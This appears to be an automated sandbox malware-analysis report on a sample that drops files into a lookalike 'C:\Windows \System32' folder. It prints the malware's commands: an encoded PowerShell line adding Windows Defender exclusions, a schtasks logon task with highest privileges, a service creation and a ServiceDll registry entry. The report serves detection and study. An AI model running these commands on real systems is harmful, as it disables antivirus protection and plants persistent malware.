Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AFC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free, 28_2_00007FF8B83AFC30
PE file contains sections with non-standard names
Source: app64.exe Static PE information: section name: .xdata
Source: pyld.dll.3.dr Static PE information: section name: .xdata
Source: libiconv-2.dll.13.dr Static PE information: section name: .xdata
Source: libiconv-2.dll.13.dr Static PE information: section name: /4
Source: libiconv-2.dll.13.dr Static PE information: section name: /19
Source: libiconv-2.dll.13.dr Static PE information: section name: /31
Source: libiconv-2.dll.13.dr Static PE information: section name: /45
Source: libiconv-2.dll.13.dr Static PE information: section name: /57
Source: libiconv-2.dll.13.dr Static PE information: section name: /70
Source: libiconv-2.dll.13.dr Static PE information: section name: /81
Source: libiconv-2.dll.13.dr Static PE information: section name: /92
Source: libintl-9.dll.13.dr Static PE information: section name: .xdata
Source: libintl-9.dll.13.dr Static PE information: section name: /4
Source: libintl-9.dll.13.dr Static PE information: section name: /19
Source: libintl-9.dll.13.dr Static PE information: section name: /31
Source: libintl-9.dll.13.dr Static PE information: section name: /45
Source: libintl-9.dll.13.dr Static PE information: section name: /57
Source: libintl-9.dll.13.dr Static PE information: section name: /70
Source: libintl-9.dll.13.dr Static PE information: section name: /81
Source: libintl-9.dll.13.dr Static PE information: section name: /92
Source: libwinpthread-1.dll.13.dr Static PE information: section name: .xdata
Source: console_zero.exe.13.dr Static PE information: section name: .fptable
Source: vcruntime140d.dll.13.dr Static PE information: section name: _RDATA
Source: usvcldr64.dat.13.dr Static PE information: section name: .fptable
Source: x590769.dat.13.dr Static PE information: section name: .fptable
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF117338 pushfq ; retf 0_2_00007FF7DF117339
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF117393 push rbp; retf 0_2_00007FF7DF1173C3
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF1177EE push rax; retf 0_2_00007FF7DF1177F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848FF0DB6 push es; ret 3_2_00007FF848FF0DB7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF848E1D2A5 pushad ; iretd 16_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF848F332F2 pushad ; retf 16_2_00007FF848F33329
Source: C:\Windows\System32\svchost.exe Code function: 28_2_649487B2 push r11; ret 28_2_649487ED
Source: C:\Windows\System32\svchost.exe Code function: 28_2_660224A8 push rax; retf 28_2_660224B1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829984B push 00000000h; retf 28_2_68299850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_682970AC push rax; iretd 28_2_682970AD
Source: C:\Windows\System32\svchost.exe Code function: 28_2_682951B2 push rdx; retn 0000h 28_2_682951B3
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829998B push 00000000h; ret 28_2_68299990
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829999B push 00000000h; iretd 28_2_682999A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829AA73 push 00000000h; ret 28_2_6829AA78
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829ABBB push 00000000h; retf 28_2_6829ABC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829ABB3 push 00000000h; ret 28_2_6829ABB8
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829A7AB push 00000000h; iretd 28_2_6829A7B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC2D0 push 680001C2h; retn 0001h 28_2_00007FF8A92EC2D5
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC2C8 push 680001C2h; retn 0001h 28_2_00007FF8A92EC2CD
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC2B8 push 050001C2h; retn 0001h 28_2_00007FF8A92EC2C5
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83ACC08 push rdi; retn 0004h 28_2_00007FF8B83ACC09
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83ACC0C push rdx; ret 28_2_00007FF8B83ACC0D
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83ACC08 push rdi; retn 0004h 34_2_00007FF8B83ACC09
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83ACC0C push rdx; ret 34_2_00007FF8B83ACC0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CD08A push eax; retf 40_2_00007FF8479CD08B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479C5F3B push FFFFFFE8h; ret 40_2_00007FF8479C5FF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479C5EF2 push FFFFFFE8h; ret 40_2_00007FF8479C5FF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CCE62 pushad ; retf 40_2_00007FF8479CCE63
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CBDDD pushad ; retf 40_2_00007FF8479CBF03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CBD2D pushad ; retf 40_2_00007FF8479CBF03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CBC7D push esp; retf 40_2_00007FF8479CBC2C

Persistence and Installation Behavior
barindex
Creates a Windows Service pointing to an executable in C:\Windows
Source: C:\Windows\System32\reg.exe Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x590769\Parameters ServiceDll C:\Windows\System32\x590769.dat Jump to behavior
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Executable created and started: C:\Windows \System32\printui.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x590769.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll Jump to dropped file
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\printui.dll (copy) Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvcldr64.dat Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x590769.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll Jump to dropped file
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\printui.dll (copy) Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvcldr64.dat Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Creates or modifies windows services
Source: C:\Windows\System32\reg.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x590769\Parameters Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
